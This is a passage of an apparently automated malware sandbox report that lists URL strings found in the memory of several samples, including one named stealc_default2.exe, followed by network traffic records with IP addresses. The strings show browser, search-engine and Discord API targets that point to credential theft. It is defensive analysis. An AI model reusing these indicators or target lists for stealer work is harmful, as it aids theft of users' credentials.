                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000003179000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.00000000033F4000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000003179000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000030B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20ResponseD
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21ResponseD
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.00000000033F4000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000003179000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000030B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22ResponseD
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.000000000316C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2875623535.000000000338C000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.00000000033F4000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000003179000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000030B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4ResponseD
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5ResponseD
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6ResponseD
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002F1B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000029F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7ResponseD
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000003095000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8ResponseD
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000338C000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000003174000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9ResponseD
                                  Source: stories.exe, 00000014.00000003.2826954081.0000000002230000.00000004.00001000.00020000.00000000.sdmp, stories.exe, 00000014.00000003.2827256040.0000000002008000.00000004.00001000.00020000.00000000.sdmp, stories.tmp, 00000015.00000000.2828637379.0000000000401000.00000020.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.innosetup.com/
                                  Source: stories.exe, 00000014.00000002.3332146749.0000000000401000.00000020.00000001.01000000.00000013.sdmpString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
                                  Source: stories.exe, 00000014.00000002.3332146749.0000000000401000.00000020.00000001.01000000.00000013.sdmpString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                                  Source: stealc_default2.exe, 00000013.00000002.3061112605.0000000068E3D000.00000002.00000001.01000000.00000021.sdmpString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                                  Source: stories.exe, 00000014.00000003.2826954081.0000000002230000.00000004.00001000.00020000.00000000.sdmp, stories.exe, 00000014.00000003.2827256040.0000000002008000.00000004.00001000.00020000.00000000.sdmp, stories.tmp, 00000015.00000000.2828637379.0000000000401000.00000020.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.remobjects.com/ps
                                  Source: stories.exe, 00000014.00000003.2826954081.0000000002230000.00000004.00001000.00020000.00000000.sdmp, stories.exe, 00000014.00000003.2827256040.0000000002008000.00000004.00001000.00020000.00000000.sdmp, stories.tmp, 00000015.00000000.2828637379.0000000000401000.00000020.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.remobjects.com/psU
                                  Source: stealc_default2.exe, 00000013.00000002.3028700532.000000001AFFC000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.3060182683.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                                  Source: needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.x-ways.net/order
                                  Source: needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.x-ways.net/order.html-d.htmlS
                                  Source: needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.x-ways.net/winhex/license
                                  Source: needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.x-ways.net/winhex/license-d-f.htmlS
                                  Source: needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.x-ways.net/winhex/subscribe
                                  Source: needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.x-ways.net/winhex/subscribe-d.htmlU
                                  Source: hjhTHr6fWy.exe, 0000000F.00000002.2936243800.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.2994583849.0000000000805000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                                  Source: penis.exe, 00000018.00000002.2884267791.0000000002F9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.s
                                  Source: penis.exe, 00000018.00000002.2884267791.0000000002F9E000.00000004.00000800.00020000.00000000.sdmp, crypted.exe, 0000001B.00000002.2955093646.0000000003A05000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
                                  Source: stealc_default2.exe, 00000013.00000002.3044045737.00000000271A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                                  Source: stealc_default2.exe, 00000013.00000002.3044045737.00000000271A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                                  Source: hjhTHr6fWy.exe, 0000000F.00000002.2936243800.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.2994583849.0000000000805000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                                  Source: hjhTHr6fWy.exe, 0000000F.00000002.2936243800.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.2994583849.0000000000805000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                                  Source: hjhTHr6fWy.exe, 0000000F.00000002.2936243800.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.2994583849.0000000000805000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                                  Source: stealc_default2.exe, 00000013.00000002.3044045737.00000000271A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                                  Source: stealc_default2.exe, 00000013.00000002.3044045737.00000000271A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                                  Source: penis.exe, 00000018.00000002.2884267791.0000000003030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
                                  Source: hjhTHr6fWy.exe, 0000000F.00000002.2936243800.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.2994583849.0000000000805000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                                  Source: stealc_default2.exe, 00000013.00000002.2994583849.0000000000805000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                                  Source: hjhTHr6fWy.exe, 0000000F.00000002.2936243800.00000000032DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabS
                                  Source: hjhTHr6fWy.exe, 0000000F.00000002.2936243800.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.2994583849.0000000000805000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                  Source: svchost.exe, 0000001A.00000003.2874602060.0000019DEABA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                                  Source: svchost.exe, 0000001A.00000003.2874602060.0000019DEAB30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                                  Source: needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/tesseract-ocr/tessdata/
                                  Source: stealc_default2.exe, 00000013.00000002.3044045737.00000000271A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                                  Source: needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                                  Source: stealc_default2.exe, 00000013.00000003.2954194570.000000002D39E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                                  Source: stealc_default2.exe, 00000013.00000003.2954194570.000000002D39E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
                                  Source: stealc_default2.exe, 00000013.00000002.3044045737.00000000271A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                                  Source: stealc_default2.exe, 00000013.00000002.3044045737.00000000271A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                                  Source: hjhTHr6fWy.exe, 0000000F.00000002.2936243800.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.2994583849.0000000000805000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                                  Source: hjhTHr6fWy.exe, 0000000F.00000002.2936243800.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.2994583849.0000000000805000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                                  Source: stealc_default2.exe, 00000013.00000002.2996721656.0000000000F8C000.00000004.00000001.01000000.00000012.sdmpString found in binary or memory: https://www.mozilla.org/about/
                                  Source: stealc_default2.exe, 00000013.00000003.2954194570.000000002D39E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                                  Source: stealc_default2.exe, 00000013.00000002.2996721656.0000000000F8C000.00000004.00000001.01000000.00000012.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                                  Source: stealc_default2.exe, 00000013.00000003.2954194570.000000002D39E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                                  Source: stealc_default2.exe, 00000013.00000002.2996721656.0000000000F8C000.00000004.00000001.01000000.00000012.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                                  Source: stealc_default2.exe, 00000013.00000003.2954194570.000000002D39E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                                  Source: stealc_default2.exe, 00000013.00000002.2996721656.0000000000F8C000.00000004.00000001.01000000.00000012.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
                                  Source: stealc_default2.exe, 00000013.00000002.2996721656.0000000000F8C000.00000004.00000001.01000000.00000012.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
                                  Source: stealc_default2.exe, 00000013.00000003.2954194570.000000002D39E000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.2996721656.0000000000F8C000.00000004.00000001.01000000.00000012.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                                  Source: stealc_default2.exe, 00000013.00000003.2954194570.000000002D39E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                                  Source: stealc_default2.exe, 00000013.00000002.2996721656.0000000000F8C000.00000004.00000001.01000000.00000012.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                                  Source: stealc_default2.exe, 00000013.00000003.2954194570.000000002D39E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                                  Source: needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ssl.com/repository0
                                  Source: needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.x-ways.net/forensics/x-tensions.html
                                  Source: needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.x-ways.net/forensics/x-tensions.htmlf
                                  Source: needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.x-ways.net/winhex/forum/
                                  Source: needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.x-ways.net/winhex/forum/www.x-ways.net/winhex/templates/www.x-ways.net/dongle_protection
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                                  Source: unknownHTTPS traffic detected: 172.67.162.108:443 -> 192.168.2.5:49761 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 104.21.4.136:443 -> 192.168.2.5:49764 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49768 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49770 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49772 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 172.67.162.108:443 -> 192.168.2.5:49775 version: TLS 1.2
